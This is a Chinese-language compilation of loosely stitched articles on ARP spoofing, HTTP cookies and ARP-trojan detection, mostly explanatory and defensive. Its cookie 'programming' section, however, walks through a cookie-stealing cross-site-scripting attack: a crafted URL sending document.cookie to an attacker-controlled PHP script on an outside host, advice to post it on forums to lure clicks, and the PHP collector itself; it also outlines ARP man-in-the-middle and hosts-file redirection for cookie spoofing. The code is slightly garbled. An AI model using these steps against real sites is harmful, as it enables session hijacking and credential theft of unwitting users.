在局域网中，通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞。
ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。
每台安装有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如下
主机 IP地址 MAC地址
A 192.168.16.1 aa-aa-aa-aa-aa-aa
B 192.168.16.2 bb-bb-bb-bb-bb-bb
C 192.168.16.3 cc-cc-cc-cc-cc-cc
D 192.168.16.4 dd-dd-dd-dd-dd-dd
我们以主机A（192.168.16.1）向主机B（192.168.16.2）发送数据为例。当发送数据时，主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了，也就知道了目标MAC地址，直接把目标MAC地址写入帧里面发送就可以了；如果在ARP缓存表中没有找到相对应的IP地址，主机A就会在网络上发送一个广播，目标MAC地址是“FF.FF.FF.FF.FF.FF”，这表示向同一网段内的所有主机发出这样的询问：“192.168.16.2的MAC地址是什么？”网络上其他主机并不响应ARP询问，只有主机B接收到这个帧时，才向主机A做出这样的回应：“192.168.16.2的MAC地址是bb-bb-bb-bb-bb-bb”。这样，主机A就知道了主机B的MAC地址，它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表，下次再向主机B发送信息时，直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制，在一段时间内如果表中的某一行没有使用，就会被删除，这样可以大大减少ARP缓存表的长度，加快查询速度。
从上面可以看出，ARP协议的基础就是信任局域网内所有的人，那么就很容易实现在以太网上的ARP欺骗。对目标A进行欺骗，A去Ping主机C却发送到了DD-DD-DD-DD-DD-DD这个地址上。如果进行欺骗的时候，把C的MAC地址骗为DD-DD-DD-DD-DD-DD，于是A发送到C上的数据包都变成发送给D的了。这不正好是D能够接收到A发送的数据包了么，嗅探成功。
A对这个变化一点都没有意识到，但是接下来的事情就让A产生了怀疑。因为A和C连接不上了。D对接收到A发送给C的数据包可没有转交给C。
做“man in the middle”，进行ARP重定向。打开D的IP转发功能，A发送过来的数据包，转发给C，好比一个路由器一样。不过，假如D发送ICMP重定向的话就中断了整个计划。
D直接进行整个包的修改转发，捕获到A发送给C的数据包，全部进行修改后再转发给C，而C接收到的数据包完全认为是从A发送来的。不过，C发送的数据包又直接传递给A，倘若再次进行对C的ARP欺骗。现在D就完全成为A与C的中间桥梁了，对于A和C之间的通讯就可以了如指掌了。

ARP（Address Resolution Protocol）是TCP/IP协议中用来解析网络节点地址的底层协议。网络中流传的ARP病毒或恶意软件利用ARP机制进行地址欺骗。最常见的ARP问题可以分为如下三种类型：
1) 网关或服务器IP欺骗：利用ARP机制，冒用局域网中的网关或其他服务器IP地址，把正常应该传给网关或服务器的数据流引向进行ARP欺骗的计算机，从而造成网络中断或时断时续，或数据丢失。
2) 隐蔽盗用IP：利用ARP机制，在对方不知情的情况下盗用他人IP，进行恶意网络活动，由此可进行各种侵权操作。
3) 强行占用IP：利用ARP机制，攻击他人IP，最终达到占用他人IP，由此进行各种恶意或侵权操作。

cookie
目录·用途
·生存周期
·识别功能
·偷窃Cookie和脚本攻击
·Cookies的替代品
·cookie的具体含义

另请参阅Cookies。
Cookie正在校对翻译，欢迎您积极校对与修订。
原文在。
Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109。它是网景公司的前雇员Lou Montulli在1993年3月的发明。

用途

服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息，以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站，用户可能会得到提示，是否在下一次进入此网站时保留用户信息以便简化登录手续，这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品，这些信息都会写入Cookies，以便在最后付款时提取信息。

使用和禁用Cookie

用户可以改变浏览器的设置，以使用或者禁用Cookies。

微软 Internet Explorer

工具 > Internet选项 > 隐私页

调节滑块或者点击“高级”，进行设置.

Mozilla Firefox

工具 > 选项 > 隐私

(注: 在Linux版本中，可能会是如下操作：编辑 > 属性 > 隐私 ， 而Mac则是：Firefox > 属性 > 隐私)

设置Cookies选项
设定阻止/允许的各个域内Cookie
查看Cookies管理窗口，检查现存Cookie信息，选择删除或者阻止它们

苹果计算机 Safari

Safari > 预置 > 安全标签

选择以下的选项
总是 接受 Cookies
永不 接受 Cookies
接受 Cookies 仅从您浏览的站点 (例如，不接受来自其它站点的广告) 预设的选项.
您可以显示所有驻留在您浏览器中的 cookies，也可随时将它们之一删除。

Konqueror

如果没有设置cookie列表，请记住在域名前面加入“.”，例如.baidu.org，否则百度将不会读取cookie(针对KDE 3.3)。

生存周期

Cookie可以保持登录信息到用户下次与服务器的会话，换句话说，下次访问同一网站时，用户会发现不必输入用户名和密码就已经登录了（当然，不排除用户手工删除Cookie）。而还有一些Cookie在用户退出会话的时候就被删除了，这样可以有效保护个人隐私。

识别功能

如果在一台计算机中安装多个浏览器，每个浏览器都会独立的空间存放cookie。因为cookie中不但可以确认用户，还能包含计算机和浏览器的信息，所以一个用户用不同的浏览器登录或者用不同的计算机登录，都会得到不同的cookie信息，另一方面，对于在同一台计算机上使用同一浏览器的多用户群，cookie不会区分他们的身份，除非他们使用不同的用户名登录。

反对cookies者

一些人反对cookie在网络中的应用，他们的理由如下：

识别不精确

参见上面的识别功能

隐私，安全和广告

Cookies在某种程度上说已经严重危及用户的隐私和安全。其中的一种方法是：一些公司的高层人员为了某种目的（譬如市场调研）而访问了从未去过的网站（通过搜索引擎查到的），而这些网站包含了一种叫做网页臭虫的图片，该图片透明，且只有一个象素大小（以便隐藏），它们的作用是将所有访问过此页面的计算机写入cookie。而后，电子商务网站将读取这些cookie信息，并寻找写入这些cookie的网站，随即发送包含了针对这个网站的相关产品广告的垃圾邮件给这些高级人员。

因为更具有针对性，使得这套系统行之有效，收到邮件的客户或多或少表现出对产品的兴趣。这些站点一旦写入cookie并使其运作，就可以从电子商务网站那里获得报酬，以维系网站的生存。

鉴于隐藏的危害性，瑞典已经通过对cookie立法，要求利用cookie的网站必须说明cookie的属性，并且指导用户如何禁用cookie。

偷窃Cookie和脚本攻击

尽管cookie没有病毒那么危险，但它仍包含了一些敏感信息：用户名，计算机名，使用的浏览器和曾经访问的网站。用户不希望这些内容泄漏出去，尤其是当其中还包含有私人信息的时候。

这并非危言耸听，一种名为Cross site scrīpting的工具可以达到此目的。在受到Cross site scrīpting攻击时，cookie盗贼和cookie毒药将窃取内容。一旦cookie落入攻击者手中，它将会重现其价值。

cookie盗贼：搜集用户cookie并发给攻击者的黑客。攻击者将利用cookie信息通过合法手段进入用户帐户。
cookie毒药：利用安全机制，攻击者加入代码从而改写cookie内容，以便持续攻击。

Cookies的替代品

鉴于cookie的局限和反对者的声音，有如下一些替代方法：

Brownie方案，是一项开放源代码工程，由SourceForge发起。Brownie曾被用以共享在不同域中的接入，而cookies则被构想成单一域中的接入。这项方案已经停止开发。
P3P，用以让用户获得更多控制个人隐私权利的协议。在浏览网站时，它类似于cookie。
在与服务器传输数据时，通过在地址后面添加唯一查询串，让服务器识别是否合法用户，也可以避免使用cookie。

cookie的具体含义

cookie 历来指就着牛奶一起吃的点心。然而，在因特网内，“cookie”这个字有了完全不同的意思。那么“cookie”到底是什么呢？“Cookie”是小量信息，由网络服务器发送出来以存储在网络浏览器上，从而下次这位独一无二的访客又回到该网络服务器时，可从该浏览器读回此信息。这是很有用的，让浏览器记住这位访客的特定信息，如上次访问的位置、花费的时间或用户首选项（如样式表）。Cookie 是个存储在浏览器目录的文本文件，当浏览器运行时，存储在 RAM 中。一旦阁下从该网站或网络服务器退出，Cookie 也可存储在计算机的硬驱上。I3I.net的打算是，当访客结束其浏览器对话时，即终止I3I.net的所有 cookie。
Cookie 有哪些用途？
Cookie 的用途之一是存储用户在特定网站上的密码和 ID。另外，也用于存储起始页的首选项。在提供个人化查看的网站上，将要求阁下的网络浏览器利用阁下计算机硬驱上的少量空间来储存这些首选项。这样，每次阁下登录该网站时，阁下的浏览器将检查阁下是否就该唯一的服务器有任何预先定义的首选项（cookie）。如果有的话，浏览器将此 cookie 随阁下对网页的请求一起发送给服务器。Microsoft 和 Netscape 使用 cookie 在其网站上创建个人起始页。各家公司利用 cookie 的一般用途包括：在线定货系统、网站个人化和网站跟踪。
网站个人化是 cookie 最有益的用途之一。例如，当谁来到 CNN 网站，但并不想查看任何商务新闻。网站允许他将该项选为选项。从那时起（或者直到 cookie 逾期），他在访问 CNN 网页时将不会读到商务新闻。
这些 Cookie 是如何起作用的？
文档的 HTML 代码中的命令行告诉浏览器设置某一名称或数值的 cookie。以下是用来设置 cookie 脚本的一个普通实例。
Set-Cookie: name = VALUE;
expires = DATE;
path = PATH;
domain = DOMAIN_NAME;
那么安全性如何？HTTP Cookie 不能用来从阁下的硬驱上检索个人数据、放置病毒、得到阁下的电子邮件地址或偷窃有关阁下身份的敏感信息；然而，HTTP Cookie 可用来跟踪阁下在特定网站上的所到之处。不使用 cookie 就很难进行网站跟踪。
至于其他一切与因特网有关的事，如同阁下所希望的那样是匿名的。没有网站知道阁下是谁，除非阁下自己透露给网站。同时，cookie 只是为了更好地了解使用模式并改进网站访客的效率而采用的一个网站跟踪统计手段而已。
如果网站设计师旨在使网页能与访客更具互动作用，或者若设计师计划让访客自定义网站的外观，则就需要使用 cookie。而且，如果阁下想要网站在某些情况下改变其外观，cookie 则提供了一条快速、容易的途径，让阁下的 HTML 页面按需要而改变。最新型的服务器使用 cookie 有助于数据库的互动性，进而改进网站的整体互动性。

Cookie在英文中是小甜品的意思，而这个词我们总能在浏览器中看到，食品怎么会跟浏览器扯上关系呢？在你浏览以前登陆过的网站时可能会在网页中出现：你好XX，感觉很亲切，就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的，因此这个文件也就被称为了Cookie。想全面了解Cookie吗？看看下文吧！

　　 一.了解Cookie 适用对象：初级读者

　　 Cookie是当你浏览某网站时，网站存储在你机器上的一个小文本文件，它记录了你的用户ID，密码、浏览过的网页、停留的时间等信息，当你再次来到该网站时，网站通过读取Cookie，得知你的相关信息，就可以做出相应的动作，如在页面显示欢迎你的标语，或者让你不用输入ID、密码就直接登录等等。你可以在IE的“工具/Internet选项”的“常规”选项卡中，选择“设置/查看文件”，查看所有保存到你电脑里的Cookie。这些文件通常是以user@domain格式命名的，user是你的本地用户名，domain是所访问的网站的域名。如果你使用NetsCape浏览器，则存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，与IE不同的是，NETSCAPE是使用一个Cookie 文件记录所有网站的Cookies。

　　 为了保证上网安全我们需要对Cookie进行适当设置。打开“工具/Internet选项”中的“隐私”选项卡（注意该设置只在IE6.0中存在，其他版本IE可以在“工具/Internet选项”的“安全”标签中单击“自定义级别”按钮，进行简单调整），调整Cookie的安全级别。通常情况，可以将滑块调整到“中高”或者“高”的位置。多数的论坛站点需要使用Cookie信息，如果你从来不去这些地方，可以将安全级调到“阻止所有Cookies”。如果只是为了禁止个别网站的Cookie，可以单击“编辑”按钮，将要屏蔽的网站添加到列表中。在“高级”按钮选项中，你可以对第一方Cookie和第三方的Cookie进行设置，第一方Cookie是你正在浏览的网站的Cookie，第三方Cookie非正在浏览的网站发给你的Cookie，通常要对第三方Cookie选择“拒绝”，如图1。你如果需要保存Cookie，可以使用IE的“导入导出”功能，打开“文件/导入导出”，按提示操作即可。

　　 Cookie中的内容大多数经过了加密处理，因此在我们看来只是一些毫无意义的字母数字组合，只有服务器的CGI处理程序才知道它们真正的含义。通过一些软件我们可以查看到更多的内容，使用Cookie Pal软件查看到的Cookie信息，如图2所示。它为我们提供了Server、Expires、Name、value等选项的内容。其中，Server是存储Cookie的网站，Expires记录了Cookie的时间和生命期，Name和value字段则是具体的数据
　 二、Cookie的传递流程 适用对象：中级读者
当在浏览器地址栏中键入了一个Web站点的URL，浏览器会向该Web站点发送一个读取网页的请求，并将结果在显示器上显示。这时该网页在你的电脑上寻找Amazon网站设置的Cookie文件，如果找到，浏览器会把Cookie文件中的数据连同前面输入的URL一同发送到Amazon服务器。服务器收到Cookie数据，就会在他的数据库中检索你的ID，你的购物记录、个人喜好等信息，并记录下新的内容，增加到数据库和Cookie文件中去。如果没有检测到Cookie或者你的Cookie信息与数据库中的信息不符合，则说明你是第一次浏览该网站，服务器的CGI程序将为你创建新的ID信息，并保存到数据库中。
Cookie是利用了网页代码中的HTTP头信息进行传递的，浏览器的每一次网页请求，都可以伴随Cookie传递，例如，浏览器的打开或刷新网页操作。服务器将Cookie添加到网页的HTTP头信息中，伴随网页数据传回到你的浏览器，浏览器会根据你电脑中的Cookie设置选择是否保存这些数据。如果浏览器不允许Cookie保存，则关掉浏览器后，这些数据就消失。Cookie在电脑上保存的时间是不一样的，这些都是由服务器的设置不同决定得。Cookie有一个Expires（有效期）属性，这个属性决定了Cookie的保存时间，服务器可以通过设定Expires字段的数值，来改变Cookie的保存时间。如果不设置该属性，那么Cookie只在浏览网页期间有效，关闭浏览器，这些Cookie自动消失，绝大多数网站属于这种情况。通常情况下，Cookie包含Server、Expires、Name、value这几个字段，其中对服务器有用的只是Name和value字段，Expires等字段的内容仅仅是为了告诉浏览器如何处理这些Cookies。

　　 三、Cookie的编程实现 适用对象：高级读者

　　 多数网页编程语言都提供了对Cookie的支持。如javascrīpt、VBscrīpt、Delphi、ASP、SQL、PHP、C#等。在这些面向对象的编程语言中，对Cookie的编程利用基本上是相似的，大体过程为：先创建一个Cookie对象（Object），然后利用控制函数对Cookie进行赋值、读取、写入等操作。那么如何通过代码来获取其他用户Cookie中的敏感信息？下面进行简单的介绍。
该方法主要有两步，首先要定位你需要收集Cookie的网站，并对其进行分析，并构造URL；然后编制收集Cookie的PHP代码，并将其放到你可以控制的网站上，当不知情者单击了你构造的URL后可以执行该PHP代码。下面我们看具体的实现过程。

　　 1.分析并构造URL

　　 首先打开我们要收集Cookie的网站，这里假设是http://www.XXX.net，登陆网站输入用户名“”（不含引号），对数据进行分析抓包，得到形如“http://www.XXX.net/txl/login/login....x=28&;amp;ok.y=6”的代码，将“”更换为“”再试；如果执行成功，就开始构造URL：“http://www.cbifamily.org/cbi.php?\"%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6" target="_blank">http://www.XXX.net/txl/login/log;... swd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能够控制的某台主机上的一个脚本。需要注意的是“%2B”为符号“+”的URL编码，因为“+”将被作为空格处理。该URL就可以在论坛中发布，诱使别人点击了。

2.编制PHP脚本

　　 该脚本的作用就是收集Cookie文件，具体内容如下：

$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("info.txt","a";
fwrite($fp,$info."\n";
fclose($fp);
}
header("Location: http://www.XXX.net\";
?>

四、Cookie的安全问题 适用对象：所有希望上网安全的读者

　　 1.Cookie欺骗

　　 Cookie记录着用户的帐户ID、密码之类的信息，如果在网上传递，通常使用的是MD5方法加密。这样经过加密处理后的信息，即使被网络上一些别有用心的人截获，也看不懂，因为他看到的只是一些无意义的字母和数字。然而，现在遇到的问题是，截获Cookie的人不需要知道这些字符串的含义，他们只要把别人的Cookie向服务器提交，并且能够通过验证，他们就可以冒充受害人的身份，登陆网站。这种方法叫做Cookie欺骗。Cookie欺骗实现的前提条件是服务器的验证程序存在漏洞，并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录是非常困难的，例如，编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的，用支持Cookie的语言编写一小段代码就可以实现（具体方法见三），只要把这段代码放到网络里，那么所有人的Cookie都能够被收集。如果一个论坛允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到论坛里，然后给帖子取一个吸引人的主题，写上有趣的内容，很快就可以收集到大量的Cookie。在论坛上，有许多人的密码就被这种方法盗去的。至于如何防范，目前还没有特效药，我们也只能使用通常的防护方法，不要在论坛里使用重要的密码，也不要使用IE自动保存密码的功能，以及尽量不登陆不了解底细的网站。

　　 2.Flash的代码隐患

Flash中有一个getURL（）函数，Flash可以利用这个函数自动打开指定的网页。因此它可能把你引向一个包含恶意代码的网站。打个比方，当你在自己电脑上欣赏精美的Flash动画时，动画帧里的代码可能已经悄悄地连上网，并打开了一个极小的包含有特殊代码的页面。这个页面可以收集你的Cookie、也可以做一些其他的事情，比如在你的机器上种植木马甚至格式化你的硬盘等等。对于Flash的这种行为，网站是无法禁止的，因为这是Flash文件的内部行为。我们所能做到的，如果是在本地浏览尽量打开防火墙，如果防火墙提示的向外发送的数据包并不为你知悉，最好禁止。如果是在Internet上欣赏，最好找一些知名的大网站。  

cookies
（甜饼）

HTTP协议下的一种方法，通过该方法，服务器或脚本能够在客户工作站上维护状态或状态信息。

Cookies有可能指：

因特网浏览器的记录标记Cookie；
已改组的香港歌唱组合Cookies。
西方甜食曲奇饼。

Cookies亦称Cookie
Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存，或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时，由Web服务器置于你硬盘上的一个非常小的文本文件，它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。当你再次来到该网站时，网站通过读取Cookies，得知你的相关信息，就可以做出相应的动作，如在页面显示欢迎你的标语，或者让你不用输入ID、密码就直接登录等等。

从本质上讲，它可以看作是你的身份证。但Cookies不能作为代码执行，也不会传送病毒，且为你所专有，并只能由提供它的服务器来读取。保存的信息片断以“名/值”对(name-value pairs)的形式储存，一个“名/值”对仅仅是一条命名的数据。一个网站只能取得它放在你的电脑中的信息，它无法从其它的Cookies文件中取得信息，也无法得到你的电脑上的其它任何东西。

Cookies中的内容大多数经过了加密处理，因此一般用户看来只是一些毫无意义的字母数字组合，只有服务器的CGI处理程序才知道它们真正的含义。

由于Cookies是我们浏览的网站传输到用户计算机硬盘中的文本文件或内存中的数据，因此它在硬盘中存放的位置与使用的操作系统和浏览器密切相关。在Windows 9X系统计算机中，Cookies文件的存放位置为C:WindowsCookies，在Windows NT/2000/XP的计算机中，Cookies文件的存放位置为C:\Documents and Settings\用户名\Cookies。

硬盘中的Cookies文件可以被Web浏览器读取，它的命令格式为：用户名@网站地址[数字].txt。如笔者计算机中的一个Cookies文件名为：ch@163[1].txt。要注意的是：硬盘中的Cookies属于文本文件，不是程序。

Cookies的设置

你可以在IE的“工具/Internet选项”的“常规”选项卡中，选择“设置/查看文件”，查看所有保存到你电脑里的Cookies。这些文件通常是以user@domain格式命名的，user是你的本地用户名，domain是所访问的网站的域名。如果你使用NetsCape浏览器，则存放在“C:PROGRAMFILESNETS- CAPEUSERS”里面，与IE不同的是，NETSCAPE是使用一个Cookie文件记录所有网站的Cookies。

我们可对Cookie进行适当设置：打开“工具/Internet选项”中的“隐私”选项卡（注意该设置只在IE6.0中存在，其他版本IE可以单击“工具/Internet选项”“安全”标签中的“自定义级别”按钮，进行简单调整），调整Cookie的安全级别。通常情况，可以调整到“中高”或者“高”的位置。多数的论坛站点需要使用Cookie信息，如果你从来不去这些地方，可以将安全级调到“阻止所有Cookies”;如果只是为了禁止个别网站的Cookie，可以单击“编辑”按钮，将要屏蔽的网站添加到列表中。在“高级”按钮选项中，你可以对第一方Cookie和第三方的Cookie进行设置，第一方Cookie是你正在浏览的网站的Cookie，第三方Cookie是非正在浏览的网站发给你的Cookie，通常要对第三方Cookie选择“拒绝”。你如果需要保存Cookie，可以使用IE的“导入导出”功能，打开“文件/导入导出”，按提示操作即可。

Cookies的写入与读取

Cookies集合是附属于Response对象及Request对象的数据集合，使用时需要在前面加上Response或Request。

用于给客户机发送Cookies的语法通常为：

当给不存在的Cookies集合设置时，就会在客户机创建，如果该Cookies己存在，则会被代替。由于Cookies是作为HTTP传输的头信息的一部分发给客户机的，所以向客户机发送Cookies的代码一般放在发送给浏览器的HTML文件的标记之前。

如果用户要读取Cookies，则必须使用Request对象的Cookies集合，其使用方法是：

需要注意的是，只有在服务器未被下载任何数据给浏览器前，浏览器才能与Server进行Cookies集合的数据交换，一旦浏览器开始接收Server所下载的数据，Cookies的数据交换则停止，为了避免错误，要在程序和前面加上response.Buffer=True。

Cookies的应用

几乎所有的网站设计者在进行网站设计时都使用了Cookie，因为他们都想给浏览网站的用户提供一个更友好的、人文化的浏览环境，同时也能更加准确地收集访问者的信息。

网站浏览人数管理

由于代理服务器、缓存等的使用，唯一能帮助网站精确统计来访人数的方法就是为每个访问者建立一个唯一的ID。使用Cookie，网站可以完成以下工作：测定多少人访问过；测定访问者中有多少是新用户（即第一次来访），多少是老用户；测定一个用户多久访问一次网站。

通常情况下，网站设计者是借助后台数据库来实现以上目的的。当用户第一次访问该网站时，网站在数据库中建立一个新的ID，并把ID通过Cookie传送给用户。用户再次来访时，网站把该用户ID对应的计数器加1，得到用户的来访次数或判断用户是新用户还是老用户。

按照用户的喜好定制网页外观

有的网站设计者，为用户提供了改变网页内容、布局和颜色的权力，允许用户输入自己的信息，然后通过这些信息对网站的一些参数进行修改，以定制网页的外观。

在电子商务站点中实现诸如“购物篮”等功能

可以使用Cookie记录用户的ID，这样当你往“购物篮”中放了新东西时，网站就能记录下来，并在网站的数据库里对应着你的ID记录当你“买单”时，网站通过ID检索数据库中你的所有选择就能知道你的“购物篮”里有些什么。

在一般的事例中，网站的数据库能够保存的有你所选择的内容、你浏览过的网页、你在表单里填写的信息等；而包含有你的唯一ID的Cookie则保存在你的电脑里。

Cookies的缺陷

Cookie虽然被广泛的应用，并能做到一些使用其它技术不可能实现的功能。但也存在一些不够完美的方面，给应用带来不便。

多人共用一台电脑的问题

任何公共场合的电脑或者许多在办公室或家里使用的电脑，都会同时被两个以上的人使用。这样，当你用它在网上超市购物时，网上超市或网站会在这台机器上留下一个Cookie，将来也许就会有某个人试图使用你的账户购物，带来了不安全的可能。当然，在一些使用多用户操作系统如Windows NT或UNIX的电脑上，这并不会成为一个问题。因为在多用户操作系统下不同的账户的Cookie分别放在不同的地方。

Cookies被删除时

假如你的浏览器不能正常工作，你可能会删除电脑上所有的临时Internet文件。然而，一旦这样操作以后，你就会丢掉所有的Cookies文件。当你再次访问一个网站时，网站会认为你是一位新用户并分配给你一个新的用户ID以及一个新的Cookie。结果将会造成网站统计的新老用户比发生偏差，而你也难以恢复过去保存的参数选择。

一人使用多台电脑时

有的人一天之中经常使用一台以上的电脑。例如在办公室里有一台电脑、家里有一台、还有移动办公用的笔记本电脑。除非网站使用了特别的技术来解决这一问题，否则，你将会有三个不同的Cookies文件在这三台机器上，而在三台机器上访问过的任何网站都将会把你看成三个不同的用户。

防范Cookies泄密

想知道你访问的网站是否在你的硬盘或内存中写入了Cookies信息吗？只需执行下面的操作步骤，就可以了解和控制你正在访问的网站的Cookies信息。

步骤一 点击IE窗口中的“工具” “Internet选项”，打开“Internet选项”设置窗口；

步骤二 点击“Internet选项”设置窗口中的“安全”标签，然后再点击“自定义级别”按钮，进入“安全设置”窗口；

步骤三 找到“安全设置”窗口中的“Cookies”设置项。“Cookies”设置项下有两个分选项，其中“允许使用存储在您计算机上的Cookies”是针对存储在用户计算机硬盘中的Cookies文件；“允许使用每个对话Cookies（未存储）”是针对存储在用户计算机内存中的Cookies信息。存储在硬盘中的Cookies文件是永久存在的，而存储在内存中的Cookies信息是临时的。要想IE在即将接收来自Web站点的所有Cookies时进行提示，可分别选择上面两个分选项中的“提示”项。当然，你也可以选择“启用”，允许IE接受所有的Cookies信息（这也是IE的默认选项）；选择“禁止”，则是不允许Web站点将Cookies存储到您的计算机上，而且Web站点也不能读取你计算机中已有的Cookies。

IE6.0提供了更为可靠的个人隐私及安全保护措施，可以让用户来控制浏览器向外发送信息的多少。在“Internet 选项”窗口中新增了“隐私”选项卡（图1），用户可以在其中直接设置浏览时的隐私级别，按需要控制其他站点对自己电脑所使用的Cookies。如果我们正在浏览的站点使用了Cookie，那么在浏览器状态栏中会有一个黄色惊叹号的标记，双击后可打开“隐私报告”对话框，用户可以在其中查看具体的隐私策略，还可直接点击“设置”按钮后在上述“隐私”选项卡中调节安全隐私级别。

在“常规”选项卡中还增加了“删除Cookies”按钮（图2），方便用户直接清除本机上的Cookies。另外，在“工具” “选项” “高级”选项卡中也增加了一些进一步提高安全性的选项（如关闭浏览器时清空Internet临时文件）。其实，如何更好地保护个人隐私和安全是微软下一代“.NET”战略软件中的关键技术，现在IE6.0已经尝试着迈出了第一步。

另外，由于Cookies的信息并不都是以文件形式存放在计算机里，还有部分信息保存在内存里。比如你在浏览网站的时候，Web服务器会自动在内存中生成Cookie，当你关闭IE浏览器的时候又自动把Cookie删除，那样上面介绍的两种方法就起不了作用，我们需要借助注册表编辑器来修改系统设置。要注意的是，修改注册表前请作备份，以便出现问题后能顺利恢复。

运行Regedit，找到如下键值：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet\ SettingsCacheSpecial PathsCookies，这是Cookies在内存中的键值，把这个键值删除。至此Cookies无论以什么形式存在，我们都不用再害怕了。 （注：新版本Windows可能已经不在此注册表目录下）

最后有必要说明的一点是：杜绝Cookies虽然可以增强你电脑的信息安全程度，但这样做同样会有一些弊端。比如在一些需要Cookies支持的网页上，会发生一些莫名其妙的错误，典型的例子就是你以后不能使用某些网站的免费信箱了。

Cookies欺骗

通过分析Cookie的格式，我们知道，最后两项中分别是它的URL路径和域名，服务器对Cookie的识别靠的就是这两个参数。正常情况下，我们要浏览一个网站时输入的URL便是它的域名，需要经过域名管理系统DNS将其转化为IP地址后进行连接。若能在DNS上进行一些设置，把目标域名的IP地址对应到其它站点上，我们便可以非法访问目标站点的Cookie了。

要进行Cookies欺骗，其实很简单。比如在Win9X下的安装目录下，有一名为hosts.sam的文件，以文本方式打开后会看到这样的格式：

127.0.0.1 localhost

经过设置，便可以实现域名解析的本地化，只需将IP和域名依上面的格式添加到文件中并另存为hosts即可。hosts文件实际上可以看成一个本机的DNS系统，它可以负责把域名解释成IP地址，它的优先权比DNS服务器要高，它的具体实现是TCP/IP协议中的一部分。
 

什么是ARP?
     ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的低层协议，负责将某个IP地址解析成对应的MAC地址。

什么是ARP欺骗?
     从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。
     第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。在PC看来，就是上不了网了，“网络掉线了”。

      近期，一种新型的“ ARP 欺骗”木马病毒正在校园网中扩散，严重影响了校园网的正常运行。感染此木马的计算机试图通过“ ARP 欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。ARP欺骗木马的中毒现象表现为：使用校园网时会突然掉线，过一段时间后又会恢复正常。比如客户端状态频频变红，用户频繁断网，IE浏览器频繁出错，以及一些常用软件出现故障等。如果校园网是通过身份认证上网的，会突然出现可认证，但不能上网的现象（无法ping通网关），重启机器或在MS-DOS窗口下运行命令arp -d后，又可恢复上网。ARP欺骗木马十分猖狂，危害也特别大，各大学校园网、小区网、公司网和网吧等局域网都出现了不同程度的灾情，带来了网络大面积瘫痪的严重后果。ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外，还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易，盗窃网上银行账号来做非法交易活动等，这是木马的惯用伎俩，给用户造成了很大的不便和巨大的经济损失。

   如何检查和处理“ ARP 欺骗”木马的方法

1 ．检查本机的“ ARP 欺骗”木马染毒进程

同时按住键盘上的“ CTRL ”和“ ALT ”键再按“ DEL ”键，选择“任务管理器”，点选“进程”标签。察看其中是否有一个名为“ MIR0.dat ”的进程。如果有，则说明已经中毒。右键点击此进程后选择“结束进程”。参见右图。

2 ．检查网内感染“ ARP 欺骗”木马染毒的计算机
在“开始” - “程序” - “附件”菜单下调出“命令提示符”。输入并执行以下命令：
ipconfig
记录网关 IP 地址，即“ Default Gateway ”对应的值，例如“ 59.66.36.1 ”。再输入并执行以下命令：
arp –a
在“ Internet Address ”下找到上步记录的网关 IP 地址，记录其对应的物理地址，即“ Physical Address ”值，例如“ 00-01-e8-1f-35-54 ”。在网络正常时这就是网关的正确物理地址，在网络受“ ARP 欺骗”木马影响而不正常时，它就是木马所在计算机的网卡物理地址。
也可以扫描本子网内的全部 IP 地址，然后再查 ARP 表。如果有一个 IP 对应的物理地址与网关的相同，那么这个 IP 地址和物理地址就是中毒计算机的 IP 地址和网卡物理地址。

3 ．设置 ARP 表避免“ ARP 欺骗”木马影响的方法
本方法可在一定程度上减轻中木马的其它计算机对本机的影响。用上边介绍的方法确定正确的网关 IP 地址和网关物理地址，然后在 “命令提示符”窗口中输入并执行以下命令：
arp –s 网关 IP 网关物理地址

4.态ARP绑定网关
   步骤一：
